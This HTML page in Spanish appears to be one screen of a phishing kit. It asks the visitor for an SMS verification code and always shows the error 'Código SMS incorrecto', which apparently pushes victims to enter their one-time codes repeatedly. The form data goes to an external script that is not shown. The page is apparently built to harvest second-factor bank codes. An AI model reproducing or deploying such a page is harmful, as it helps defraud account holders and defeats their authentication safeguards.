<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/main.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body style="background-color: #f3f3f3">
    <div class="hed">
        <img src="./img/hed1.JPG" alt="">
    </div>
<div class="hed2">
    <img src="./img/sms.JPG" alt="">
</div>
    <div class="kolch">
        <form method="post" id="pg4">
            <p>SMS</p>
            <input type="text" name="" id="sps2" required>
    
            <p style="margin-left: 0px; margin-top: -10px; color: rgb(192, 28, 28);">Código SMS incorrecto</p>
            
            <button type="submit">Validar</button>
        </form>
    </div>

    <div class="bot">
        <img style="width: 100%; margin-top: 80px;" src="./img/bot.JPG" alt="">
    </div>
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>